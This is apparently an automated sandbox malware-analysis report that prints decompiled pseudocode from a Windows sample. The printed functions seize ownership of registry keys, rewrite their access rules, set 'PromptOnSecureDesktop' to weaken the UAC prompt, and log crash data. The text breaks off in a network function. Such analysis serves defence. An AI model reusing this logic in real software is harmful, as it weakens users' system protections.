                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcat$FileModule$DeleteHandle$CloseDirectoryDriveNameOpenProcessTypeValuelstrcpy$AddressAttributesCreateEnvironmentExitInformationPathProcSystemTempVariableVolumeWindowslstrlenwsprintf
                                                                                                                                  • String ID: "$"$"$D$P$\
                                                                                                                                  • API String ID: 1653845638-2605685093
                                                                                                                                  • Opcode ID: f5c9b7b3d8278428c0912f33a1d156d5b052250314973edf34d1b588c2b8a337
                                                                                                                                  • Instruction ID: b568d63c7a68c2aae07d916e7ecd401e1ecb298828109104d3c0c40f9d49894e
                                                                                                                                  • Opcode Fuzzy Hash: f5c9b7b3d8278428c0912f33a1d156d5b052250314973edf34d1b588c2b8a337
                                                                                                                                  • Instruction Fuzzy Hash: 5EF153B1D40259AFDF11DBA0CD49EEF7BBCAB18300F1444A7F60AE6241E7758A848F65
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00407A95 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 269registrymemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 99%
                                                                                                                                  			E00407A95(void* _a4, char* _a8, signed int _a12) {
				int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				struct _ACL* _v32;
				long _v36;
				long _v40;
				long _v44;
				int _v48;
				int _v52;
				union _SID_NAME_USE _v56;
				int _v60;
				int _v64;
				void _v132;
				char _v388;
				char _v516;
				struct _SECURITY_DESCRIPTOR _v1540;
				void* _t95;
				void* _t104;
				void* _t107;
				void* _t111;
				void* _t116;
				struct _ACL* _t117;
				void* _t118;
				void* _t120;
				void* _t122;
				void* _t123;
				void* _t125;
				char* _t126;
				void* _t130;
				void* _t134;
				void* _t135;
				signed int _t136;
				void* _t143;
				void* _t146;
				int _t148;
				int _t151;
				void** _t159;
				void* _t161;
				void* _t164;
				signed int _t172;
				void* _t173;
				char* _t174;
				void* _t175;
				void* _t176;

				_v32 = 0;
				_v12 = 0;
				_v28 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0xe0100,  &_v28) != 0) {
					return 0;
				}
				_v40 = 0x80;
				_t95 = GetUserNameA( &_v388,  &_v40);
				__eflags = _t95;
				if(_t95 == 0) {
					L48:
					RegCloseKey(_v28);
					return _v12;
				} else {
					_v36 = 0x44;
					_v44 = 0x80;
					_t104 = LookupAccountNameA(0,  &_v388,  &_v132,  &_v36,  &_v516,  &_v44,  &_v56);
					__eflags = _t104;
					if(_t104 == 0) {
						goto L48;
					}
					_v48 = 0x400;
					_t107 = RegGetKeySecurity(_v28, 5,  &_v1540,  &_v48);
					__eflags = _t107;
					if(_t107 != 0) {
						goto L48;
					}
					_t111 = GetSecurityDescriptorOwner( &_v1540,  &_v16,  &_v60);
					__eflags = _t111;
					if(_t111 == 0) {
						L12:
						_v24 = 0;
						_t116 = GetSecurityDescriptorDacl( &_v1540,  &_v64,  &_v32,  &_v52);
						__eflags = _t116;
						if(_t116 == 0) {
							L47:
							goto L48;
						}
						_t117 = _v32;
						__eflags = _t117;
						if(_t117 == 0) {
							goto L47;
						}
						_t164 = 0;
						_v8 = 0;
						__eflags = 0 - _t117->AceCount;
						if(0 >= _t117->AceCount) {
							goto L47;
						} else {
							goto L15;
						}
						do {
							L15:
							_t118 = GetAce(_t117, _v8,  &_v20);
							__eflags = _t118;
							if(_t118 == 0) {
								L31:
								_t73 =  &_v8;
								 *_t73 = _v8 + 1;
								__eflags =  *_t73;
								goto L32;
							}
							_t172 = 0;
							_v16 = _v20 + 8;
							__eflags = _t164;
							if(_t164 <= 0) {
								L21:
								__eflags = _t164 - 0x20;
								if(_t164 < 0x20) {
									 *((intOrPtr*)(_t176 + _t164 * 4 - 0x100)) = _v16;
									_t164 = _t164 + 1;
									__eflags = _t164;
								}
								_t134 = EqualSid( &_v132, _v16);
								_t159 = _v20;
								__eflags = _t134;
								if(_t134 == 0) {
									_t135 = 0x20000;
								} else {
									asm("sbb eax, eax");
									_t135 = ( ~_a12 & 0x00010006) + 0xe0039;
								}
								__eflags = _t159[1] - _t135;
								if(_t159[1] != _t135) {
									_t159[1] = _t135;
									_t159 = _v20;
									_v24 = 1;
								}
								__eflags =  *_t159;
								if( *_t159 != 0) {
									L30:
									 *_t159 = 0;
									_t136 = _v16;
									__eflags =  *(_t136 + 8);
									_t68 =  *(_t136 + 8) == 0;
									__eflags = _t68;
									_v24 = 1;
									 *((char*)(_v20 + 1)) = 2 + (_t136 & 0xffffff00 | _t68) * 8;
									goto L31;
								} else {
									__eflags = _t159[0] & 0x00000010;
									if((_t159[0] & 0x00000010) == 0) {
										goto L31;
									}
									goto L30;
								}
							} else {
								goto L17;
							}
							while(1) {
								L17:
								_t143 = EqualSid( *(_t176 + _t172 * 4 - 0x100), _v16);
								__eflags = _t143;
								if(_t143 != 0) {
									break;
								}
								_t172 = _t172 + 1;
								__eflags = _t172 - _t164;
								if(_t172 < _t164) {
									continue;
								}
								break;
							}
							__eflags = _t172 - _t164;
							if(_t172 >= _t164) {
								goto L21;
							}
							DeleteAce(_v32, _v8);
							_v24 = 1;
							L32:
							_t117 = _v32;
							__eflags = _v8 - (_t117->AceCount & 0x0000ffff);
						} while (_v8 < (_t117->AceCount & 0x0000ffff));
						__eflags = _v24;
						if(_v24 == 0) {
							goto L47;
						}
						__eflags =  *0x4121a8; // 0x0
						if(__eflags == 0) {
							L41:
							_v12 = 1;
							_t173 = LocalAlloc(0x40, 0x14);
							__eflags = _t173;
							if(_t173 != 0) {
								_t120 = InitializeSecurityDescriptor(_t173, 1);
								__eflags = _t120;
								if(_t120 != 0) {
									_t122 = SetSecurityDescriptorDacl(_t173, 1, _v32, 0);
									__eflags = _t122;
									if(_t122 != 0) {
										_t123 = RegSetKeySecurity(_v28, 4, _t173);
										__eflags = _t123;
										if(_t123 == 0) {
											_v12 = 1;
										}
									}
								}
								LocalFree(_t173);
							}
							goto L47;
						}
						__eflags =  *0x412cc0; // 0x0
						if(__eflags == 0) {
							goto L41;
						}
						_v12 = 0;
						_t125 = RegOpenKeyExA(_a4, _a8, 0, 0x103,  &_v12);
						__eflags = _t125;
						if(_t125 != 0) {
							goto L41;
						}
						_t126 = 0x4121a8;
						_t83 =  &(_t126[1]); // 0x4121a9
						_t174 = _t83;
						do {
							_t161 =  *_t126;
							_t126 =  &(_t126[1]);
							__eflags = _t161;
						} while (_t161 != 0);
						_t130 = RegSetValueExA(_v12, E00402544("PromptOnSecureDesktop", 0x4106dc, 0xa, 0xe4, 0xc8), 0, 2, 0x4121a8, _t126 - _t174 + 1);
						__eflags = _t130;
						if(_t130 == 0) {
							 *0x412cc0 = 0;
						}
						goto L41;
					}
					_t146 = EqualSid( &_v132, _v16);
					__eflags = _t146;
					if(_t146 != 0) {
						goto L12;
					}
					_v12 = 1;
					_t175 = LocalAlloc(0x40, 0x14);
					__eflags = _t175;
					if(_t175 != 0) {
						_t148 = InitializeSecurityDescriptor(_t175, 1);
						__eflags = _t148;
						if(_t148 != 0) {
							_t151 = SetSecurityDescriptorOwner(_t175,  &_v132, 0);
							__eflags = _t151;
							if(_t151 != 0) {
								RegSetKeySecurity(_v28, 1, _t175);
							}
						}
						LocalFree(_t175);
					}
					goto L12;
				}
			}


















































                                                                                                                                  0x00407aae
                                                                                                                                  0x00407ab4
                                                                                                                                  0x00407ab7
                                                                                                                                  0x00407ac2
                                                                                                                                  0x00000000
                                                                                                                                  0x00407ac4
                                                                                                                                  0x00407adc
                                                                                                                                  0x00407adf
                                                                                                                                  0x00407ae5
                                                                                                                                  0x00407ae7
                                                                                                                                  0x00407da7
                                                                                                                                  0x00407daa
                                                                                                                                  0x00000000
                                                                                                                                  0x00407aed
                                                                                                                                  0x00407b0c
                                                                                                                                  0x00407b13
                                                                                                                                  0x00407b16
                                                                                                                                  0x00407b1c
                                                                                                                                  0x00407b1e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407b34
                                                                                                                                  0x00407b3b
                                                                                                                                  0x00407b41
                                                                                                                                  0x00407b43
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407b59
                                                                                                                                  0x00407b5f
                                                                                                                                  0x00407b61
                                                                                                                                  0x00407bb8
                                                                                                                                  0x00407bcb
                                                                                                                                  0x00407bce
                                                                                                                                  0x00407bd4
                                                                                                                                  0x00407bd6
                                                                                                                                  0x00407da6
                                                                                                                                  0x00000000
                                                                                                                                  0x00407da6
                                                                                                                                  0x00407bdc
                                                                                                                                  0x00407bdf
                                                                                                                                  0x00407be1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407be9
                                                                                                                                  0x00407beb
                                                                                                                                  0x00407bee
                                                                                                                                  0x00407bf2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407bf8
                                                                                                                                  0x00407bf8
                                                                                                                                  0x00407c00
                                                                                                                                  0x00407c06
                                                                                                                                  0x00407c08
                                                                                                                                  0x00407cc6
                                                                                                                                  0x00407cc6
                                                                                                                                  0x00407cc6
                                                                                                                                  0x00407cc6
                                                                                                                                  0x00000000
                                                                                                                                  0x00407cc6
                                                                                                                                  0x00407c14
                                                                                                                                  0x00407c16
                                                                                                                                  0x00407c19
                                                                                                                                  0x00407c1b
                                                                                                                                  0x00407c4f
                                                                                                                                  0x00407c4f
                                                                                                                                  0x00407c52
                                                                                                                                  0x00407c57
                                                                                                                                  0x00407c5e
                                                                                                                                  0x00407c5e
                                                                                                                                  0x00407c5e
                                                                                                                                  0x00407c66
                                                                                                                                  0x00407c6c
                                                                                                                                  0x00407c6f
                                                                                                                                  0x00407c71
                                                                                                                                  0x00407c86
                                                                                                                                  0x00407c73
                                                                                                                                  0x00407c78
                                                                                                                                  0x00407c7f
                                                                                                                                  0x00407c7f
                                                                                                                                  0x00407c8b
                                                                                                                                  0x00407c8e
                                                                                                                                  0x00407c90
                                                                                                                                  0x00407c93
                                                                                                                                  0x00407c96
                                                                                                                                  0x00407c96
                                                                                                                                  0x00407c9d
                                                                                                                                  0x00407c9f
                                                                                                                                  0x00407ca7
                                                                                                                                  0x00407ca7
                                                                                                                                  0x00407ca9
                                                                                                                                  0x00407cac
                                                                                                                                  0x00407cb2
                                                                                                                                  0x00407cb2
                                                                                                                                  0x00407cb5
                                                                                                                                  0x00407cc3
                                                                                                                                  0x00000000
                                                                                                                                  0x00407ca1
                                                                                                                                  0x00407ca1
                                                                                                                                  0x00407ca5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407ca5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407c1d
                                                                                                                                  0x00407c1d
                                                                                                                                  0x00407c27
                                                                                                                                  0x00407c2d
                                                                                                                                  0x00407c2f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407c31
                                                                                                                                  0x00407c32
                                                                                                                                  0x00407c34
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407c34
                                                                                                                                  0x00407c36
                                                                                                                                  0x00407c38
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407c40
                                                                                                                                  0x00407c46
                                                                                                                                  0x00407cc9
                                                                                                                                  0x00407cc9
                                                                                                                                  0x00407cd0
                                                                                                                                  0x00407cd0
                                                                                                                                  0x00407cd9
                                                                                                                                  0x00407cdc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407ce2
                                                                                                                                  0x00407ce8
                                                                                                                                  0x00407d5a
                                                                                                                                  0x00407d61
                                                                                                                                  0x00407d6a
                                                                                                                                  0x00407d6c
                                                                                                                                  0x00407d6e
                                                                                                                                  0x00407d72
                                                                                                                                  0x00407d78
                                                                                                                                  0x00407d7a
                                                                                                                                  0x00407d82
                                                                                                                                  0x00407d88
                                                                                                                                  0x00407d8a
                                                                                                                                  0x00407d92
                                                                                                                                  0x00407d98
                                                                                                                                  0x00407d9a
                                                                                                                                  0x00407d9c
                                                                                                                                  0x00407d9c
                                                                                                                                  0x00407d9a
                                                                                                                                  0x00407d8a
                                                                                                                                  0x00407da0
                                                                                                                                  0x00407da0
                                                                                                                                  0x00000000
                                                                                                                                  0x00407d6e
                                                                                                                                  0x00407cea
                                                                                                                                  0x00407cf0
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407cff
                                                                                                                                  0x00407d05
                                                                                                                                  0x00407d0b
                                                                                                                                  0x00407d0d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407d14
                                                                                                                                  0x00407d16
                                                                                                                                  0x00407d16
                                                                                                                                  0x00407d19
                                                                                                                                  0x00407d19
                                                                                                                                  0x00407d1b
                                                                                                                                  0x00407d1c
                                                                                                                                  0x00407d1c
                                                                                                                                  0x00407d4a
                                                                                                                                  0x00407d50
                                                                                                                                  0x00407d52
                                                                                                                                  0x00407d54
                                                                                                                                  0x00407d54
                                                                                                                                  0x00000000
                                                                                                                                  0x00407d52
                                                                                                                                  0x00407b6a
                                                                                                                                  0x00407b70
                                                                                                                                  0x00407b72
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00407b7b
                                                                                                                                  0x00407b84
                                                                                                                                  0x00407b86
                                                                                                                                  0x00407b88
                                                                                                                                  0x00407b8c
                                                                                                                                  0x00407b92
                                                                                                                                  0x00407b94
                                                                                                                                  0x00407b9c
                                                                                                                                  0x00407ba2
                                                                                                                                  0x00407ba4
                                                                                                                                  0x00407bab
                                                                                                                                  0x00407bab
                                                                                                                                  0x00407ba4
                                                                                                                                  0x00407bb2
                                                                                                                                  0x00407bb2
                                                                                                                                  0x00000000
                                                                                                                                  0x00407b88

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00407ABA
                                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 00407ADF
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,0041070C,?,004133B0,?), ref: 00407B16
                                                                                                                                  • RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00407B3B
                                                                                                                                  • GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00407B59
                                                                                                                                  • EqualSid.ADVAPI32(?,00000022), ref: 00407B6A
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407B7E
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407B8C
                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407B9C
                                                                                                                                  • RegSetKeySecurity.ADVAPI32(00000000,00000001,00000000), ref: 00407BAB
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00407BB2
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,00407FC9,?,00000000), ref: 00407BCE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                                                                  • String ID: D$PromptOnSecureDesktop
                                                                                                                                  • API String ID: 2976863881-1403908072
                                                                                                                                  • Opcode ID: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                                                                  • Instruction ID: e17c9e5f60e255820364911aa1186e0accab4a2e7248257c6285c946b731c67d
                                                                                                                                  • Opcode Fuzzy Hash: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                                                                  • Instruction Fuzzy Hash: 6FA14D71D04219ABDB119FA0DD44EEF7B78FF48304F04807AE505F2290D779AA85CB69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD7CFC Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 269registrymemoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,000E0100,?), ref: 00AD7D21
                                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 00AD7D46
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00AD7D7D
                                                                                                                                  • RegGetKeySecurity.ADVAPI32(?,00000005,?,?), ref: 00AD7DA2
                                                                                                                                  • GetSecurityDescriptorOwner.ADVAPI32(?,?,?), ref: 00AD7DC0
                                                                                                                                  • EqualSid.ADVAPI32(?,?), ref: 00AD7DD1
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 00AD7DE5
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00AD7DF3
                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00AD7E03
                                                                                                                                  • RegSetKeySecurity.ADVAPI32(?,00000001,00000000), ref: 00AD7E12
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00AD7E19
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AD7E35
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                                                                  • String ID: D$PromptOnSecureDesktop
                                                                                                                                  • API String ID: 2976863881-1403908072
                                                                                                                                  • Opcode ID: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
                                                                                                                                  • Instruction ID: a905a2e7bfaed542c6a369792cdbbd47f8a25210f9b4116dc804412c943fcfdb
                                                                                                                                  • Opcode Fuzzy Hash: 1a53823342927d1e4650e54f1beed8d9b04cc787a6d03e02cd47dd5285ddf864
                                                                                                                                  • Instruction Fuzzy Hash: F6A13271900219AFDF21CF91DD84FEEBB79FB08340F14806AF506E6250EB758A85CB64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00406511 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 182COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 57%
                                                                                                                                  			E00406511(void* __ecx) {
				signed int _t75;
				signed int _t76;
				int _t78;
				void* _t83;
				signed int _t93;
				void* _t95;
				signed int _t99;
				int _t101;
				int _t115;
				int _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t122;
				intOrPtr _t135;
				intOrPtr* _t137;
				void* _t139;
				void* _t141;
				void* _t143;
				void* _t144;
				void* _t152;

				_t122 = __ecx;
				_t139 = _t141 - 0x74;
				_t75 =  *(_t139 + 0x7c);
				_t135 =  *((intOrPtr*)(_t75 + 4));
				_t76 =  *_t75;
				 *(_t139 + 0x7c) = _t76;
				_t78 = wsprintfA(_t139 - 0x898, "\nver=%d date=%s %s\nc=%08x a=%p", 0x5e, "Jan 13 2018", "12:08:32",  *_t76,  *((intOrPtr*)(_t76 + 0xc)));
				_t143 = _t141 - 0x90c + 0x1c;
				_t117 = _t78;
				if(IsBadReadPtr( *( *(_t139 + 0x7c) + 0xc), 8) != 0) {
					E0040E318();
					ExitProcess(0);
				}
				_t83 =  *( *(_t139 + 0x7c) + 0xc);
				__imp__#8( *((intOrPtr*)(_t83 + 4)), E00406511);
				__imp__#8();
				_t118 = _t117 + wsprintfA(_t139 + _t117 - 0x898, " va=%08X%08X uef=%p",  *( *(_t139 + 0x7c) + 0xc),  *( *( *(_t139 + 0x7c) + 0xc)), _t83);
				_t119 = _t118 + wsprintfA(_t139 + _t118 - 0x898, "\n_ax=%p\t_bx=%p\t_cx=%p\t_dx=%p\t_si=%p\t_di=%p\t_bp=%p\t_sp=%p\n",  *((intOrPtr*)(_t135 + 0xb0)),  *((intOrPtr*)(_t135 + 0xa4)),  *((intOrPtr*)(_t135 + 0xac)),  *((intOrPtr*)(_t135 + 0xa8)),  *((intOrPtr*)(_t135 + 0xa0)),  *((intOrPtr*)(_t135 + 0x9c)),  *((intOrPtr*)(_t135 + 0xb4)),  *((intOrPtr*)(_t135 + 0xc4)));
				E0040EE2A(_t122, _t139 - 0x98, 0, 0x108);
				_t144 = _t143 + 0x48;
				 *((intOrPtr*)(_t139 - 0x98)) =  *((intOrPtr*)(_t135 + 0xb8));
				_t93 = 3;
				_push(0);
				_push(0);
				 *(_t139 - 0x8c) = _t93;
				 *((intOrPtr*)(_t139 - 0x94)) = 0;
				_push(0);
				 *(_t139 - 0x5c) = _t93;
				_push(0);
				 *((intOrPtr*)(_t139 - 0x68)) =  *((intOrPtr*)(_t135 + 0xc4));
				 *((intOrPtr*)(_t139 - 0x64)) = 0;
				_t130 =  *((intOrPtr*)(_t135 + 0xb4));
				 *(_t139 - 0x6c) = _t93;
				 *(_t139 + 0x7c) = _t93;
				_push(_t135);
				_push(_t139 - 0x98);
				 *((intOrPtr*)(_t139 - 0x78)) =  *((intOrPtr*)(_t135 + 0xb4));
				 *((intOrPtr*)(_t139 - 0x74)) = 0;
				_push(0);
				while(1) {
					_t95 = GetCurrentProcess();
					__imp__StackWalk64(0x14c, _t95);
					if(_t95 == 0) {
						break;
					}
					_t95 = 0;
					if( *(_t139 + 0x7c) != 0) {
						if( *((intOrPtr*)(_t139 - 0x88)) != 0) {
							_t115 = wsprintfA(_t139 + _t119 - 0x898, "ret=%p\tp1=%p\tp2=%p\tp3=%p\tp4=%p\n",  *((intOrPtr*)(_t139 - 0x88)),  *((intOrPtr*)(_t139 - 0x40)),  *((intOrPtr*)(_t139 - 0x38)),  *((intOrPtr*)(_t139 - 0x30)),  *((intOrPtr*)(_t139 - 0x28)));
							_t144 = _t144 + 0x1c;
							_t119 = _t119 + _t115;
							_t95 = 0;
						}
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) - 1;
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t135);
						_push(_t139 - 0x98);
						_push(_t95);
						continue;
					}
					break;
				}
				 *(_t139 + 0x7c) = _t95;
				_t120 = _t119 + wsprintfA(_t139 + _t119 - 0x898, "plgs:");
				 *(_t139 + 0x70) =  *(_t139 + 0x70) & 0x00000000;
				do {
					_t137 = 0x412c40 +  *(_t139 + 0x70) * 4;
					if( *_t137 != 0) {
						_t99 =  *(_t139 + 0x7c) & 0x80000007;
						if(_t99 < 0) {
							_t152 = (_t99 - 0x00000001 | 0xfffffff8) + 1;
						}
						if(_t152 == 0) {
							_t120 = _t120 + wsprintfA(_t139 + _t120 - 0x898, "\n");
						}
						_t101 = wsprintfA(_t139 + _t120 - 0x898, "\t%d=%p",  *(_t139 + 0x70),  *_t137);
						_t144 = _t144 + 0x10;
						_t120 = _t120 + _t101;
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) + 1;
					}
					 *(_t139 + 0x70) =  *(_t139 + 0x70) + 1;
				} while ( *(_t139 + 0x70) < 0x20);
				wsprintfA(_t139 + _t120 - 0x898, "\n");
				E0040E8A1(_t130, 1, "localcfg", "except_info", _t139 - 0x898);
				E0040E318();
				return 1;
			}
























                                                                                                                                  0x00406511
                                                                                                                                  0x00406512
                                                                                                                                  0x0040651c
                                                                                                                                  0x00406521
                                                                                                                                  0x00406524
                                                                                                                                  0x00406532
                                                                                                                                  0x0040654d
                                                                                                                                  0x0040654f
                                                                                                                                  0x00406552
                                                                                                                                  0x00406564
                                                                                                                                  0x0040674e
                                                                                                                                  0x00406755
                                                                                                                                  0x00406755
                                                                                                                                  0x0040656d
                                                                                                                                  0x00406578
                                                                                                                                  0x00406587
                                                                                                                                  0x004065a3
                                                                                                                                  0x004065e3
                                                                                                                                  0x004065ee
                                                                                                                                  0x004065f9
                                                                                                                                  0x00406600
                                                                                                                                  0x00406606
                                                                                                                                  0x00406607
                                                                                                                                  0x00406608
                                                                                                                                  0x00406609
                                                                                                                                  0x0040660f
                                                                                                                                  0x0040661b
                                                                                                                                  0x0040661c
                                                                                                                                  0x0040661f
                                                                                                                                  0x00406620
                                                                                                                                  0x00406623
                                                                                                                                  0x00406626
                                                                                                                                  0x0040662c
                                                                                                                                  0x0040662f
                                                                                                                                  0x00406632
                                                                                                                                  0x00406639
                                                                                                                                  0x0040663a
                                                                                                                                  0x0040663d
                                                                                                                                  0x00406640
                                                                                                                                  0x0040668a
                                                                                                                                  0x0040668a
                                                                                                                                  0x00406696
                                                                                                                                  0x0040669e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00406643
                                                                                                                                  0x00406648
                                                                                                                                  0x00406650
                                                                                                                                  0x00406671
                                                                                                                                  0x00406673
                                                                                                                                  0x00406676
                                                                                                                                  0x00406678
                                                                                                                                  0x00406678
                                                                                                                                  0x0040667a
                                                                                                                                  0x0040667d
                                                                                                                                  0x0040667e
                                                                                                                                  0x0040667f
                                                                                                                                  0x00406680
                                                                                                                                  0x00406681
                                                                                                                                  0x00406688
                                                                                                                                  0x00406689
                                                                                                                                  0x00000000
                                                                                                                                  0x00406689
                                                                                                                                  0x00000000
                                                                                                                                  0x00406648
                                                                                                                                  0x004066a0
                                                                                                                                  0x004066b3
                                                                                                                                  0x004066b5
                                                                                                                                  0x004066ba
                                                                                                                                  0x004066bd
                                                                                                                                  0x004066c7
                                                                                                                                  0x004066cc
                                                                                                                                  0x004066d1
                                                                                                                                  0x004066d7
                                                                                                                                  0x004066d7
                                                                                                                                  0x004066d8
                                                                                                                                  0x004066eb
                                                                                                                                  0x004066eb
                                                                                                                                  0x004066ff
                                                                                                                                  0x00406701
                                                                                                                                  0x00406704
                                                                                                                                  0x00406706
                                                                                                                                  0x00406706
                                                                                                                                  0x00406709
                                                                                                                                  0x0040670c
                                                                                                                                  0x0040671f
                                                                                                                                  0x00406734
                                                                                                                                  0x0040673c
                                                                                                                                  0x0040674b

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
                                                                                                                                  • String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
                                                                                                                                  • API String ID: 2400214276-165278494
                                                                                                                                  • Opcode ID: c6cd3b0fe5fb700a95fcef714526d2b1842a8a69a0543b8ebdda1302f97d4f33
                                                                                                                                  • Instruction ID: e6dd37f2d7c7e48b8b359c94d8b0a85da35b73f81cc1d7405eac3f4e783bc3bd
                                                                                                                                  • Opcode Fuzzy Hash: c6cd3b0fe5fb700a95fcef714526d2b1842a8a69a0543b8ebdda1302f97d4f33
                                                                                                                                  • Instruction Fuzzy Hash: 26615F72940208EFDB609FB4DC45FEA77E9FF08300F24846AF95DD2161DA7599908F58
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040A7C1 Relevance: 38.8, APIs: 8, Strings: 14, Instructions: 299networkstringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 49%
                                                                                                                                  			E0040A7C1(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16) {
				short _v129;
				char _v132;
				char _v1156;
				signed int _t59;
				int _t60;
				void* _t61;
				char* _t62;
				void* _t63;
				void* _t65;
				void* _t82;
				void* _t96;
				intOrPtr _t102;
				char _t103;
				void* _t104;
				int _t121;
				intOrPtr _t123;
				void* _t124;
				CHAR* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				void* _t129;
				void* _t130;
				void* _t131;

				_t102 = _a8;
				_t2 = _t102 - 1; // 0x0
				_t59 = _t2;
				_t125 =  &_v132;
				if(_t59 > 0xb) {
					L21:
					_t60 = lstrlenA(_t125);
					_t121 = _t60;
					_t126 = __imp__#19;
					_t61 =  *_t126(_a4, _t125, _t121, 0);
					if(_t61 == _t121) {
						if(_t102 != 6) {
							L28:
							_t127 = __imp__#16;
							_t103 = 0;
							_push(0);
							_v1156 = 0;
							_v132 = 0;
